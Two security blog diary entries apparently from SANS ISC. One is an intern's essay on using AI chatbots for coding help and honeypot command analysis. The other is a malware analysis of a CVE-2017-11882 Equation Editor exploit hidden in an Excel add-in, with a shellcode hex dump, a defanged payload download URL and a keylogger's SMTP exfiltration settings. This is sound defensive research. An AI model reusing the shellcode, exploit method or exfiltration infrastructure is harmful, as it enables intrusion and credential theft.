AI and Faster Attack Analysis [Guest Diary]
[This is a Guest Diary by Joseph Noa, an ISC intern as part of the SANS.edu BACS program]
Introduction
Time is of the essence when it comes to attacks and understanding what you're seeing can be tricky when under pressure. As security professionals, we need to use every tool available to us so we can identify, stop, and then mitigate threats. Artificial Intelligence (AI) is the future. It is a tool that can make security professionals more efficient, and I cannot stress that point. It is a TOOL. ChatGPT, Gemini, Copilot, and others are readily available to us whether we subscribe or use a free tier. I use AI at my job to help me with my analysis and various tasks. So, I'm going to talk about it.
Why AI
I want to state again that AI is a tool. Security professionals use tools every day and AI is a tool that should be leveraged to help fill in knowledge gaps or assist in analysis. Google is a phenomenal tool when it comes to researching things. Whether it be you need help programming/scripting or need to know about a tool and how to use it, Google has been the go-to for years.
However, the process of using Google can be time consuming. Let's say you are programming/scripting something to perform a specific task, or that can ingest data and produce a specific result catered to your needs. You want this item to be repeatable. You are struggling to get the results you want. There is a line of code that is executing but the data is being expressed in the incorrect format, or it is only producing part of the data that it is supposed to. Maybe a loop is failing to execute. Maybe it just fails. There are endless reasons why it could be failing. This has happened to me countless times while working with PowerShell and Python. It can be an extremely frustrating process. So now we turn to Google to point us in a direction. We look at several Stack Overflow threads or another technical forum that show something similar to what you are trying to accomplish and now it is added to the code. It runs and it still fails. Then we realize the code in the thread is for Python 2 and the code that is being developed is Python 3. Features may have changed or been removed entirely. So, what now?
AI and Coding
Technology is constantly changing. There are new features and updates on a regular basis. It is impossible to keep up. I'm not a coder by trade but I have needed to build things out in Python and PowerShell. Constant trial and error. Sometimes, it is a lot more error then not.
This is where I think AI can prove to be extremely valuable. We can copy and paste code into the AI chat box and ask questions about the specific issue that is causing the code to fail to produce the desired results. AI provides instant feedback. Sometimes it may be something as simple as not having the formatting correct causing a loop to not execute but also not throw an error. AI can quickly identify the issue and return code that now has the correct formatting. We can then take that code, run it, and now we find it is working and producing the desired result. This all happens over the course of a few minutes whereas continuing to Google the issue just continues to yield different answers that fail to resolve the issue. This can happen simply due to our failure to notice that a line of code wasn't nested correctly in a loop because the indentation was incorrect.
The best part about this is that not only does the AI provide the corrected code back, but AI will also provide an explanation of the issue, highlighting the differences between the incorrect code and the corrected code. Explanations can go a long way in terms of learning and growing our skillsets.
The normal "Hello World!" test should be enough to just give a simple example of how AI can help with coding.
I'm going to run hello_world.py. The code is shown below.
#bad code
print(hello world!)
The screenshot below shows the error that's thrown when attempting to run the bad code.
Let's throw that code into Gemini (Google's AI and my preferred AI) and see what Gemini tells us.
Gemini took ingested the code, reviewed it, and, in this case, gave us the feedback within seconds. We will see that Gemini not only provided two different solutions to our problem but also explains why it wasn't working.
Let's try out the solutions. Below are the two examples of the code. I'll use them to create two scripts and then run them in my terminal to see if they work. As you can see, Gemini provided us with two solutions to our code and they both worked.
print("hello world!")
print('hello world!')
One thing to note, using AI does not replace our need to understand coding and what we are doing. AI can and will be wrong at times. We need to be able to pivot if the AI doesn't generate usable code. This is an instance where instead of looking to AI to provide the solution, we can use the information to pivot in our search for a solution based on the information we were given. Either way, we can get to where we need to be more quickly with the help of AI.
AI and Analysis
Similarly with coding, AI can be a huge benefit when it comes to the analysis of attacks. Attacks come in different forms which require different analysis. If a machine is infected with a malicious PowerShell script that has base64 encoding to obfuscate what it does, you can take that script and throw it into an AI prompt and will let you know if the script is malicious, has base64 encoding, and let you know what it's doing. AI will do this and do it rather quickly.
Another example is when a threat actor has established a shell on a system. The logs are being sent to a SIEM where you can see what commands were being executed on the machine. AI can help put together a picture of what the threat actor is attempting to accomplish based on the commands. Let's run through an example of this.
I had never done a honeypot before so the internship for the BACS is the first time I was exposed to some of these things. For my first observation, I saw some commands being run on the sensor that I wasn't familiar with. I generally understood what was happening, but I hadn't seen a `nohup $SHELL` before.
The screenshot below is from my observation assignment.
If we Google `nohup $SHELL` we can see that sometimes, even if we don't want to, we are going to get an answer from AI. Gemini is built into Google and if it can provide an answer, it will.
When we Google `nohup $SHELL` we get an answer like we would going to https://gemini.google.com/ and using the prompt to ask our question. Gemini provides a breakdown and shows that nohup command stands for "no hang up" and that $SHELL refers to the environment variable for the default shell of the user.
We can take our analysis a little further. I'm going to use the Gemini prompt and submit the entirety of the command to get a breakdown of what is happening. Both the command that was executed and the response from Gemini are extremely long so I'm going to omit the entirety of the response.
Again, we see a breakdown of the commands being run and what they are doing. This can be incredibly useful when it comes to quickly analyzing and understanding what is happening. Seconds matter and having this capability helps us get where we need to be more quickly.
Do We Need AI?
Do we need AI to do our jobs as security professionals? The answer is no. The fact is, we can absolutely accomplish what we need to without the help of AI. Is AI going to be wrong sometimes? Yes. Are we wrong sometimes? Absolutely. But not using AI as a tool that can enable us to be more efficient and react more quickly, puts us at a disadvantage. We see companies like Crowdstrike with their AI analyst (Charlotte AI) that will gather information and correlate events to provide an analyst with what they need to react. Threat actors aren't limiting themselves and are going to use anything they can to gain an advantage. Security professionals should be using every advantage we can to try and keep up. AI is the way of the future and while it's not perfect, it helps us get to where we need to be more quickly.
Crowdstrike Charlotte AI:
[1] https://www.crowdstrike.com/en-us/platform/charlotte-ai/
[2] https://www.sans.edu/cyber-security-programs/bachelors-degree/
-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
CVE-2017-11882 Will Never Die
One of the key messages broadcasted by security professionals is: "Patch, patch and patch again!". But they are nasty vulnerabilities that remain exploited by attackers even if they are pretty old. CVE-2017-11882 is one of them: this remote code execution affects Microsoft Office and, more precisely, the good old "Equation Editor". This tool was even killed by Microsoft due to numerous security issues[1]. But it still remains used by attackers to spread modern malware.
I spotted an interesting file called “urchase_order__p.o_t4787074__kronospan_aps.xlam” (no typo, the leading “P” was missing). The file (SHA256:4fe60a82350a24cc0bfeb1a9df86a751cec9b7307035f90b0a08959a16a1fc7c) has a normal VT score (38/68)[2]. These days, it’s less common to see malicious Microsoft Office documents due to the latest rules implemented by Microsoft to make macros activation tricky[3].
Indeed, the file does not contain any VBA macro but an interesting payload:
remnux@remnux:~/malwarezoo/20250812$ oledump.py urchase_order__p.o_t4787074__kronospan_aps.xlam A: xl/embeddings/wB.WOQMg A1: 3011188 ‘EqUaTIon nATIvE’ A2: 0 ‘umLKsQ5’
Let’s try to find where’s the malicious code!
remnux@remnux:~/malwarezoo/20250812$ zipdump.py urchase_order__p.o_t4787074__kronospan_aps.xlam
Index Filename Encrypted Timestamp
1 [Content_Types].xml 0 2025-08-11 01:43:16
2 _rels/.rels 0 2025-08-11 01:43:16
3 xl/_rels/workbook.xml.rels 0 2025-08-11 01:43:16
4 xl/workbook.xml 0 2025-08-11 01:43:16
5 xl/theme/theme1.xml 0 2025-08-11 01:43:16
6 xl/worksheets/_rels/sheet1.xml.rels 0 2025-08-11 01:43:16
7 xl/worksheets/sheet2.xml 0 2025-08-11 01:43:16
8 xl/worksheets/sheet3.xml 0 2025-08-11 01:43:16
9 xl/worksheets/sheet1.xml 0 2025-08-11 01:43:16
10 xl/sharedStrings.xml 0 2025-08-11 01:43:16
11 xl/styles.xml 0 2025-08-11 01:43:16
12 xl/printerSettings/printerSettings1.bin 0 2025-08-11 01:43:16
13 docProps/core.xml 0 2025-08-11 01:43:16
14 docProps/app.xml 0 2025-08-11 01:43:16
15 xl/drawings/vmlDrawing1.vml 0 2025-08-11 01:43:16
16 xl/embeddings/wB.WOQMg 0 2025-08-11 01:43:16
The file contains three sheets and, in the first one (xl/worksheets/shee1.xml), we find this:
<oleObject progId="g0naPE1NuRY" shapeId="1348" r:id="rId2" autoLoad="true"/></oleObjects>
In the relationships file, we see this:sha256su
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/wB.WOQMg"/></Relationships>
It corresponds to the stream 16. This one looks like the exploit with an obfuscated payload:
remnux@remnux:~/malwarezoo/20250812$ zipdump.py urchase_order__p.o_t4787074__kronospan_aps.xlam -s 16 -d \
oledump.py -s 1 -d | \
xxd | more
00000010: 83ab 023d 8dfa d578 c38b 2408 037e 01eb ...=...x..$..~..
00000020: 470a 0105 f89b e1ec 0000 0000 0000 0000 G...............
00000030: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000040: 0050 0645 0000 0000 0000 0000 0000 0000 .P.E............
00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000060: 0029 c344 0000 0000 eb11 81c7 e201 0000 .).D............
00000070: eb10 e98d 0000 00e9 82eb 42e8 1e00 0000 ..........B.....
00000080: eb1c 8d9f c302 0000 eb10 eb33 e996 0000 ...........3....
00000090: 0051 59e9 9700 0000 5159 eb68 ebcc 5feb .QY.....QY.h.._.
000000a0: c99c 5157 8d8f 9150 0000 8dbf 1731 0000 ..QW...P.....1..
000000b0: 81ef f87a 0000 5f59 9deb c7eb adeb 78eb ...z.._Y......x.
000000c0: 76eb 0131 eb3e 3137 ebc2 9c57 5081 c793 v..1.>17...WP...
000000d0: 0c00 008d 8789 2500 0081 efba 0b00 0050 ......%........P
000000e0: 588d b8ca 3e00 0081 c7b1 5c00 002d 8a2f X...>.....\..-./
000000f0: 0000 585f 9deb 30eb 1ceb 09eb 2aeb c7e9 ..X_..0.....*...
00000100: 75ff ffff 6bf6 0090 69f6 b313 3a7c eb03 u...k...i...:|..
00000110: 4c43 25eb 04eb a6eb eb81 c689 ad83 5eeb LC%...........^.
00000120: a5eb 0269 66eb 0b83 c704 e95b ffff ffeb ...if......[....
00000130: c690 e955 ffff ff39 df72 cde9 2201 0000 ...U...9.r.."...
00000140: 167b 3651 a462 b222 29da dca4 bcba 09a1 .{6Q.b.").......
00000150: fe8d b0b3 51ce ae8a 1a30 852a 06d6 9628 ....Q....0.*...(
00000160: 3f9a 6bf2 bb4b f104 6de9 b735 93e8 32e9 ?.k..K..m..5..2.
00000170: e973 fa5d f0a7 09e0 31d4 0414 74c1 6c34 .s.]....1...t.l4
00000180: 09e7 ea45 01b3 896d 74c4 fc1a ba33 d556 ...E...mt....3.V
00000190: b2c6 cbfd 003d fefb 4787 2c96 740a fba4 .....=..G.,.t...
000001a0: f4e1 30d0 fa17 fbd9 baed 28d5 b219 6f68 ..0.......(...oh
000001b0: de07 a811 ff10 0c5b dfc6 7e2b 8430 c2f7 .......[..~+.0..
000001c0: 8007 c10e 22f7 c4cc c4e3 bfe4 fc1f 85a1 ...."...........
000001d0: ebb3 0c19 729e b47f 7712 7a55 27b3 44b1 ....r...w.zU'.D.
000001e0: 2cda 1981 fdd5 68c4 0c26 3ec9 16bf 917d ,.....h..&>....}
000001f0: 574e 7997 d46c 73e9 91eb 9e95 da13 ff50 WNy..ls........P
00000200: 7bdb bdab 0830 653f 1735 2703 827e 197e {....0e?.5'..~.~
[...Content Skipped...]
00004e10: 0d0d 0d0d 0d0d 0d0d 0d0d 0d0d 0d0d 0d0d ................
00004e20: 0d0d 0d0d 0d0d 0d0d 0d0d 0d0d 0d0d 0d4d ...............M
00004e30: 5137 6a5a 3172 3867 766a 4562 6974 4549 Q7jZ1r8gvjEbitEI
00004e40: 7145 5056 4d59 3667 4144 3347 4f78 7231 qEPVMY6gAD3GOxr1
00004e50: 797a 6a6f 6247 5959 7338 3951 6337 6a46 yzjobGYYs89Qc7jF
00004e60: 6231 6c49 4e44 7339 5347 4330 6569 747a b1lINDs9SGC0eitz
00004e70: 6e45 6f30 5871 6662 5a62 4142 784b 5954 nEo0XqfbZbABxKYT
00004e80: 6f6c 5447 4174 7146 3751 444e 466d 4743 olTGAtqF7QDNFmGC
00004e90: 4231 5861 6248 566a 4747 6f48 5541 6b74 B1XabHVjGGoHUAkt
00004ea0: 6964 356e 5345 3373 5273 646f 766e 3058 id5nSE3sRsdovn0X
00004eb0: 5156 5177 6143 3670 4849 6339 3048 4a4e QVQwaC6pHIc90HJN
00004ec0: 636d 374a 3474 5877 686d 7968 5552 4175 cm7J4tXwhmyhURAu
00004ed0: 6f71 7a54 4748 5570 7171 3841 494c 4973 oqzTGHUpqq8AILIs
00004ee0: 6e4d 3644 6d59 4b4c 4147 6d53 684c 6b45 nM6DmYKLAGmShLkE
00004ef0: 6243 6d62 5141 6763 4934 726b 3930 6b46 bCmbQAgcI4rk90kF
00004f00: 5757 5a76 4c71 5230 3856 6154 4d42 6e50 WWZvLqR08VaTMBnP
00004f10: 3569 4a69 7257 6a37 7237 4d4a 4a76 6652 5iJirWj7r7MJJvfR
00004f20: 3551 336f 5a51 7670 7465 7542 4662 4c4c 5Q3oZQvpteuBFbLL
00004f30: 5859 3846 4b30 6645 7239 3946 626c 364c XY8FK0fEr99Fbl6L
00004f40: 6c46 354a 4479 6f68 6873 4878 3847 5177 lF5JDyohhsHx8GQw
00004f50: 4773 6c61 6347 5672 5a4b 6c79 6d41 3472 GslacGVrZKlymA4r
00004f60: 7036 4470 3537 3759 724a 4745 6e6f 3337 p6Dp577YrJGEno37
00004f70: 5770 6b38 5678 4874 466f 6974 646e 6475 Wpk8VxHtFoitdndu
00004f80: 6142 776c 7857 7447 6537 4c4f 3276 496b aBwlxWtGe7LO2vIk
00004f90: 615a 6249 6d6b 3248 436b 5a50 7849 6e4e aZbImk2HCkZPxInN
00004fa0: 4a64 6e57 6172 386d 4b54 3572 6346 386d JdnWar8mKT5rcF8m
00004fb0: 6c47 7256 4548 6e73 6849 7076 554c 6143 lGrVEHnshIpvULaC
00004fc0: 4762 4c57 6e6c 7579 4356 7a32 4b51 6536 GbLWnluyCVz2KQe6
00004fd0: 4b33 3438 6345 6264 3163 3272 345a 3346 K348cEbd1c2r4Z3F
00004fe0: 6b47 3539 4b74 466b 594f 634a 7738 7063 kG59KtFkYOcJw8pc
00004ff0: 5937 6a62 6b45 5451 5371 6962 5166 4552 Y7jbkETQSqibQfER
00005000: 316c 5a6f 7a76 3932 6447 5537 4631 6a45 1lZozv92dGU7F1jE
[...Content skipped...]
Let's verify that we are indeed facing the Equation Editor exploit. We can easily perform this task with another great Didier's tool, format-bytes.py:
remnux@remnux:~/malwarezoo/20250812$ zipdump.py urchase_order__p.o_t4787074__kronospan_aps.xlam -s 16 -d | oledump.py -s 1 -d | format-bytes.py -f name=eqn1
1: <class 'int'> 1c size of EQNOLEFILEHDR
2: <class 'int'> 15c26
3: <class 'int'> dc36
4: <class 'int'> 197e73f
5: <class 'int'> 6f506a2f
6: <class 'int'> 3d02ab83
7: <class 'int'> 78d5fa8d
8: <class 'int'> 8248bc3
9: <class 'int'> 3 Start MTEF header
10: <class 'int'> 7e
11: <class 'int'> 1
12: <class 'int'> eb
13: <class 'int'> 47
14: <class 'int'> a Full size record
15: <class 'int'> 1 Line record
16: <class 'int'> 5 Font record
17: <class 'int'> f8
18: <class 'int'> 9b
19: <class 'bytes'> 40 .......... b'e1ec0000000000000000' 0.833805 4caa3635d3c1ebf1bfc9e49745f5649c Shellcode/Command (fontname)
20: <class 'int'> 0
21: <class 'int'> 0
22: <class 'int'> 0
23: <class 'int'> 0
Remainder: 3011100
00000000: 00 00 00 00 00 00 00 00 00 29 C3 44 00 00 00 00 .........).D....
00000010: EB 11 81 C7 E2 01 00 00 EB 10 E9 8D 00 00 00 E9 ................
00000020: 82 EB 42 E8 1E 00 00 00 EB 1C 8D 9F C3 02 00 00 ..B.............
00000030: EB 10 EB 33 E9 96 00 00 00 51 59 E9 97 00 00 00 ...3.....QY.....
00000040: 51 59 EB 68 EB CC 5F EB C9 9C 51 57 8D 8F 91 50 QY.h.._...QW...P
00000050: 00 00 8D BF 17 31 00 00 81 EF F8 7A 00 00 5F 59 .....1.....z.._Y
00000060: 9D EB C7 EB AD EB 78 EB 76 EB 01 31 EB 3E 31 37 ......x.v..1.>17
00000070: EB C2 9C 57 50 81 C7 93 0C 00 00 8D 87 89 25 00 ...WP.........%.
00000080: 00 81 EF BA 0B 00 00 50 58 8D B8 CA 3E 00 00 81 .......PX...>...
00000090: C7 B1 5C 00 00 2D 8A 2F 00 00 58 5F 9D EB 30 EB ..\..-./..X_..0.
000000A0: 1C EB 09 EB 2A EB C7 E9 75 FF FF FF 6B F6 00 90 ....*...u...k...
000000B0: 69 F6 B3 13 3A 7C EB 03 4C 43 25 EB 04 EB A6 EB i...:|..LC%.....
000000C0: EB 81 C6 89 AD 83 5E EB A5 EB 02 69 66 EB 0B 83 ......^....if...
000000D0: C7 04 E9 5B FF FF FF EB C6 90 E9 55 FF FF FF 39 ...[.......U...9
000000E0: DF 72 CD E9 22 01 00 00 16 7B 36 51 A4 62 B2 22 .r.."....{6Q.b."
000000F0: 29 DA DC A4 BC BA 09 A1 FE 8D B0 B3 51 CE AE 8A )...........Q...
1I: s 0 u 0
2I: sl 0 ul 0 sb 0 ub 0
4I: sl 0 ul 0 sb 0 ub 0
4F: l 0.000000 b 0.000000
4N: b 0.0.0.0 l 0.0.0.0
4E: l 1970/01/01 00:00:00 b 1970/01/01 00:00:00
8I: sl 0 ul 0 sb 0 ub 0
8T: ul 1601/01/01 00:00:00.0000000 ub 1601/01/01 00:00:00.0000000
8F: l 0.000000 b 0.000000
16G: b 00000000-0000-0000-0029-C34400000000 m {00000000-0000-0000-0029-C34400000000}
Let's open this file in Excel. That's why I keep a very old (and vulnerable) Microsoft Office Suite in my CAPE sandbox:
And indeed:
The sample downloaded from hxxp://213[.]209[.]150[.]18/SoNZ984ijTf8DPr.exe is a VIPKeyLogger with the following config:
{
"rule": "VIPKeylogger",
"tags": [
"keylogger",
"stealer"
],
"family": "vipkeylogger",
"credentials": [
{
"host": "hosting2[.]ro[.]hostsailor[.]com",
"port": 587,
"email_to": "log@wxtp.store",
"password": "<redacted>",
"protocol": "smtp",
"username": "logs@wxtp.store"
}
]
}
The PE file (SHA256:19dac0de92478f91420db6588d40ec9a5115b4a8777cf7ba9dd4ae35059a706d) is a VT score of 49/72[4].
[1] https://support.microsoft.com/en-us/office/equation-editor-6eac7d71-3c74-437b-80d3-c7dea24fdf3f
[2] https://www.virustotal.com/gui/file/4fe60a82350a24cc0bfeb1a9df86a751cec9b7307035f90b0a08959a16a1fc7c
[3] https://learn.microsoft.com/en-us/microsoft-365-apps/security/internet-macros-blocked
[4] https://www.virustotal.com/gui/file/19dac0de92478f91420db6588d40ec9a5115b4a8777cf7ba9dd4ae35059a706d
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments